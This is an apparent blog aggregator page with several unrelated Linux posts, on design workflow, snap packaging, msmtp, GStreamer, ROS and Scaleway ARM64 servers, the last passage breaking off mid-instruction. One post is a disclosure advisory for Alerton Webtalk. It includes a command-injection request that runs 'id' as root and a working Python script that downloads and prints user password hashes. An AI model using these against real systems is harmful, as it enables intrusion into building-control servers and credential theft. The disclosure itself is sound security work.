Canonical Design Team: Designing in the open

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.

One of the main things we wanted to improve was the design sign-off process, while making it clearer to developers which design was the final one among numerous iterations and inconsistently labelled files and folders.

Here is the process we developed and have been using on multiple projects.

The process

Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.

Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.

The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.

As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

[Image: Table with actions design from the MAAS project]

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.
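
For example, the final designs might be organised along these lines (the layout below is hypothetical; the point is that each project picks a structure that makes sense for it):

designs/
├── table-actions/
│   └── table-actions-final.png
└── navigation/
    └── navigation-final.png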

Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design meets the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.

Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.

That’s it!

Benefits

If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.

Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.

If your project is open source, this process automatically makes your designs available to your community or anyone that is interested in the product. This means that anyone who wants to contribute to the project has access to the same information and assets as the team members.

The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.

Canonical is largely a company of remote workers, and sometimes conversations are not documented, which means only some people are aware of the decisions made. This design process has helped with that issue, as designs and discussions are all in a single place, with nicely laid out emails for every change anyone may be interested in.

Conclusion

This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.


Alan Pope: April Snapcraft Docs Day

Continuing Snapcraft Docs Days

In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful, so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums.

Flavour of the month

This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and, despite our best efforts, may not have caught certain edge cases that are only apparent on flavours.

If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?

Soup of the day

On Friday we'd love to hear about your experiences of doing things like the following on an Ubuntu flavour:-

Happy Hour

On the subject of snapping other people's projects, here are some tips we think you may find useful.

  • Look for new or interesting open source projects on GitHub's trending lists, such as trending Python projects or trending Go projects, or perhaps recent Show HN submissions.
  • Ask in #snapcraft on Rocket Chat if others have already started on a snap, to avoid duplication & collaborate.
  • Avoid snapping frameworks and libraries; focus instead on more atomic tools, utilities and full applications
  • Start small. Perhaps choose command line or server-based applications, as they're often easier for the beginner than full fat graphical desktop applications.
  • Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging
  • Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project so they can incorporate it in their release process (see the sketch after this list)
  • Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it
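
As a starting point for that upstream contribution, a minimal snapcraft.yaml for a hypothetical Go command-line tool might look like the following (the name, source URL and plugin choice are illustrative; adapt them to the project you're snapping):

name: hello-tool
version: '1.0'
summary: Example command-line tool
description: |
  A hypothetical CLI tool, used here only to illustrate the shape of a
  snapcraft.yaml you might contribute to an upstream project.
grade: stable
confinement: strict

parts:
  hello-tool:
    plugin: go
    source: https://github.com/example/hello-tool.git

apps:
  hello-tool:
    command: hello-tool
    plugs: [network]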

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.

Food for thought

Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

Project         Source                  Issue Tracker
Snapd           Snapd on GitHub         Snapd bugs on Launchpad
Snapcraft       Snapcraft on GitHub     Snapcraft bugs on Launchpad
Snapcraft Docs  Snappy-docs on GitHub   Snappy-docs issues on GitHub
Tutorials       Tutorials on GitHub     Tutorials issues on GitHub

Joe Barker: Configuring msmtp on Ubuntu 16.04

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I'm going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (e.g. <PASSWORD>) are placeholders that need replacing with values specific to your configuration. The exception is the log file, which can of course point wherever you wish to log any msmtp activity/warnings/errors.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc
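
At this point you can sanity-check the configuration from the shell before involving PHP. This is an optional step; substitute your own account name and recipient, and run msmtp via sudo because of the 0600 permissions we just set:

printf "Subject: msmtp test\n\nTest body text\n" | sudo msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> personal@email.com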

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don't get too large and to keep the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional; you may choose not to do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output, so diagnosing problems after the test should be relatively easy. If all is successful, you should now be able to use PHP's sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

Harald Sitter: KDE neon CMake Package Validation

In KDE neon‘s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.

The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.

As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.

cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (bad syntax, missing includes, what have you…) and that our package is sound and includes all dependencies it needs (to, for example, satisfy find_dependency macro calls).
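
To make the dependency aspect concrete: config files frequently pull in other packages via find_dependency, so a hypothetical FooConfig.cmake fragment like the one below fails at configure time if the foo-dev packaging forgot to depend on Bar's development package:

# Hypothetical fragment of a FooConfig.cmake shipped by a foo-dev package.
include(CMakeFindDependencyMacro)
# Aborts cmake with "could not find a package configuration file" if the
# deb providing BarConfig.cmake is not a dependency of foo-dev.
find_dependency(Bar)
include("${CMAKE_CURRENT_LIST_DIR}/FooTargets.cmake")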

As it turns out libkproperty3-dev is of insufficient quality. What a shame.

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110

It’s that time of year again where the broadcast industry gathers at NAB show, which seems like a good time to me to revisit some frequently asked questions about GStreamer‘s support for various broadcasting related standards

Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.

While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.

Other standards, like MXF for storage of media (which GStreamer has supported for years), are also important in the broadcasting world, but let's ignore those other use-cases here for now and focus on streaming live media.

Media Transport

All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization and are either fully (as in the case of AES67/Ravenna) supported by GStreamer already or at least to a big part, with the missing parts being just some extensions to existing code.

There’s not really much to say here about the actual media transport as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live-video streaming as required by security cameras for example.

Over the last months and years, many new features have been added to GStreamer's RTP stack for various use-cases and the code was further optimized; thanks to all that, the amount of work needed for new standards based on RTP, like the aforementioned ones, is rather limited. For AES67, for example, no additional work was needed to support it.

The biggest open issue for the broadcasting-related standards currently is the need for further optimizations for high-resolution, high-framerate streaming of video. In these cases we currently run into performance problems due to the high number of packets per second, and some serious optimizations would be needed. However, there are already various ideas for improving this situation that are just waiting to be implemented.

Synchronization

I previously wrote about PTP in GStreamer, which is supported for synchronizing media; that support has been merged and included since the 1.8 release. In addition, NTP is also supported since 1.8.

In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.

Clock Signalling

One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before is a way to signal what this specific clock exactly is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which commonly is used to describe how to set up an RTP session.
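
To make that concrete, the RFC7273 signalling appears as attributes in the SDP. A hypothetical AES67-style audio stream description might look like this (the addresses and PTP clock identity are made up):

v=0
o=- 1423986 1423994 IN IP4 192.0.2.10
s=AES67 example stream
c=IN IP4 239.69.0.1/32
t=0 0
m=audio 5004 RTP/AVP 96
a=rtpmap:96 L24/48000/2
a=ts-refclk:ptp=IEEE1588-2008:00-11-22-FF-FE-33-44-55:0
a=mediaclk:direct=0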

The support for that feature was merged for the 1.10 release and is readily available.

Help needed? Found bugs or missing features?

While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the aforementioned standards or even, in some cases, required parts of the standards. In addition, some optimizations may still be required, depending on your use-case.

If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.

GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE)

Introduction

Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are accessible via a file in the document root of the ‘webtalk’ user. The location of this file is configuration dependent, however the configuration file is accessible as well (at a static location, /~webtalk/webtalk.ini). The password database is a sqlite3 database whose name is based on the bacnet rep and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

Any user granted the “configure webtalk” permission can execute commands as the root user on the underlying server. There appears to be some effort of filtering command strings (such as rejecting commands containing pipes and redirection operators) but this is inadequate. Using this vulnerability, an attacker can add an SSH key to the root user’s authorized_keys file.

GET /~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...

Recommendation: Avoid passing user input to shell commands. If this is not possible, shell arguments should be properly escaped. Consider using one of the functions from the subprocess module without the shell=True parameter.
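
As a minimal sketch of that last suggestion (the command and injected value below are hypothetical, not Webtalk's actual code):

import subprocess

# Attacker-controlled value, echoing the injection attempt above.
update_uri = '"$(id)"'

# With argv passed as a list and no shell=True, no shell ever parses the
# string: wget receives the metacharacters as literal bytes and simply
# fails on an invalid URL instead of running id as root.
subprocess.call(['wget', update_uri])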

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against Cross-Site Request Forgery. This allows an attacker to execute administrative changes without access to valid credentials. Combined with the above vulnerability, this allows an attacker to gain root access without any credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are hashed by concatenating the password with the username (e.g., PASSUSER) and performing a plain MD5 hash. No salts or iterative hashing is performed. This does not follow password hashing best practices and makes for highly practical offline attacks.
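
Given the scheme described above, checking a candidate password against a stolen hash is a one-liner, which is what makes unsalted MD5 so practical to attack offline (the username, hash and wordlist below are hypothetical):

import hashlib

username = 'admin'                                 # UserID from userprofile.db
stolen_hash = '5f4dcc3b5aa765d61d8327deb882cf99'   # UserPassword column

# The scheme described above: plain MD5 over password + username, no salt.
for candidate in ['password', 'letmein', '123456']:
    if hashlib.md5((candidate + username).encode()).hexdigest() == stolen_hash:
        print('cracked: %s' % candidate)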

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of password hashes from Webtalk-01. While this only works on the mobile login interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting session is able to access all resources and is functionally equivalent to a login through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect secrets in transit.

Timeline

  • 2017/01/?? - Issues Discovered
  • 2017/01/26 - Issues Reported to security () honeywell com
  • 2017/01/30 - Initial response from Alerton confirming receipt.
  • 2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
  • 2017/04/26 - This disclosure

Discovery

These issues were discovered by David Tomaschik of the Google ISA Assessments team.

Appendix A: Script to Extract Hashes

import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os


def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s', url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    parser.readfp(buf)
    return parser


def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)


def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'w')
    tmpf.write(r.content)
    tmpf.close()
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    con.close()
    os.unlink(tmpname)
    return results


def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)


if __name__ == '__main__':
    for host in sys.argv[1:]:
        try:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
            continue
        for u in users:
            print '%s:%s' % (u[0], u[1])

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5]

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.

Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:

Step 1: Start with an existing gadget

Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.

Step 2: Select a name for your gadget snap

Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:

$ snapcraft register my-gadget-snap-name

If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.

Step 3: Add the required udev rule

If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:

$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"

It’s outside the scope of this series to explain udev in depth, but the two values I’ve made bold are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:

# Custom serial-port interface for the Turtlebot 2
slots:
  kobuki:
    interface: serial-port
    path: /dev/serial-port-kobuki
    usb-vendor: 0x0403
    usb-product: 0x6001

The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.
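
Once an image built with this gadget is up and running, you can verify that the slot exists (and, after installing a consumer snap, that the plug is connected) with snap interfaces. The output below is illustrative and uses my snap names; yours will differ:

$ snap interfaces
Slot                        Plug
pc-turtlebot-kyrofa:kobuki  my-turtlebot-snap:kobuki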

Step 4: Build the gadget snap

This step is easy. Just get into the gadget snap directory and run:

$ snapcraft

In the end, you’ll have a gadget snap.

Step 5: Put the gadget snap in the store

You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

  1. Without putting it in the store you have no way of updating it in the future
  2. Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):

$ snapcraft push /path/to/my/gadget.snap --release=stable

You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.

Step 6: Adjust our ROS snap to run under strict confinement

As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:

name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

parts:
  prototype-workspace:
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

plugs:
  kobuki:
    interface: serial-port

apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post. I’ve made the relevant sections bold; let’s cover them individually.

version: 0.2

We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.

plugs:
  kobuki:
    interface: serial-port

This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.

apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.

Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).
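
If your gadget snap is still stuck in manual review (or you sideload either snap), the interface won't auto-connect, but you can wire it up by hand. A sketch, assuming the snap and slot/plug names used in this series:

$ sudo snap connect my-turtlebot-snap:kobuki pc-turtlebot-kyrofa:kobuki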

In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.


Xubuntu: Xubuntu Quality Assurance team is spreading out

Up until the start of the 17.04 cycle the Xubuntu Quality Assurance team had been led by one person. During the last cycle, that person needed a break. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.

Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.

While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue this split roughly as it stands: Dave will be running the daily Xubuntu QA and Kev will focus more on QA for Xfce. It is unlikely that most of you will see much change, given that we're mostly quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.

While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targeted testing of the new GTK3 Xfce packages. You will start to see more calls on the Xubuntu development mailing list for testing of packages before they reach Xubuntu. Case in point: the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now these have come via Launchpad bug reports.

On a positive note, this change has been made possible solely by the creation of the Xubuntu QA Launchpad team some cycles ago, specifically set up to allow people from the community to be brought into the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker and they do get noticed on our IRC channels. Our hope is that we are able to increase the number of people in Xubuntu QA from the few we currently have. Increasing the number of people involved helps us increase the quality and strength of the team directly.

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish]

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).

But can you run LXD on them? Let’s see.

Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.

They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.

It takes under a minute to provision and boot the server.

Connecting to the server

It runs Linux 4.9.23. Also, the disk is vda, specifically, /dev/vda. That is, there is no partitioning and the filesystem takes over the whole device.

Here are /proc/cpuinfo and uname -a; they show the two cores (out of the 48) provided by KVM. The BogoMIPS are really Bogo on these platforms, so do not take them at face value.

Currently, Scaleway does not have their own mirror of the distribution packages but uses ports.ubuntu.com. It's 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to be different. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster. At other locations (different country), could be the other way round.

This is /var/log/auth.log, and already there are some hackers trying to brute-force SSH. They have been trying with username ubnt. Note to self: do not use ubnt as the username for the non-root account.

The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this at /etc/ssh/sshd_config to look like

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

Originally, it was commented out, and had a default yes.

Finally, run

sudo systemctl reload sshd

This will not break your existing SSH session (even restart will not break your existing SSH session, how cool is that?). Now, you can create your non-root account. To get that user to sudo as root, you need to usermod -a -G sudo myusername.

There is a recovery console, accessible through the Web management screen. For this to work, it says that "You must first login and set a password via SSH to use this serial console." In reality, the root account already has a password set, and this password is stored in /root/.pw. It is not known how good this password is; therefore, when you boot a cloud server on Scaleway,

  1. Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
  2. Change the root password so that it is not the one found at /root/.pw. Store that password somewhere safe, because it is needed if you want to connect through the recovery console (see the sketch after this list)
  3. Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with username other than this ubnt.
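
A minimal sketch of steps 2 and 3, assuming a username of myusername (anything but ubnt will do):

# Replace the generated root password from /root/.pw with your own,
# and store it somewhere safe for the recovery console.
passwd root
# Create a non-root user that can sudo; SSH key authentication only.
adduser myusername
usermod -a -G sudo myusername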

Setting up ZFS support

The Ubuntu Linux kernels at Scaleway do not have ZFS support and you need to compile as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.

Actually, those instructions are apparently now obsolete with newer versions of the Linux kernel, and you need to compile both spl and zfs manually and install them.

Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, spl and zfs will originally create .rpm packages and then call alien to convert them to .deb packages. Then we hit on some alien bug (no pun intended) which gives the error "zfs-0.6.5.9-1.aarch64.rpm is for architecture aarch64 ; the package cannot be built on this system", which is weird since we are only working on aarch64.

The important files for the Linux kernel running on these Scaleway ARM64 servers are at http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/

Therefore, run as root the following:

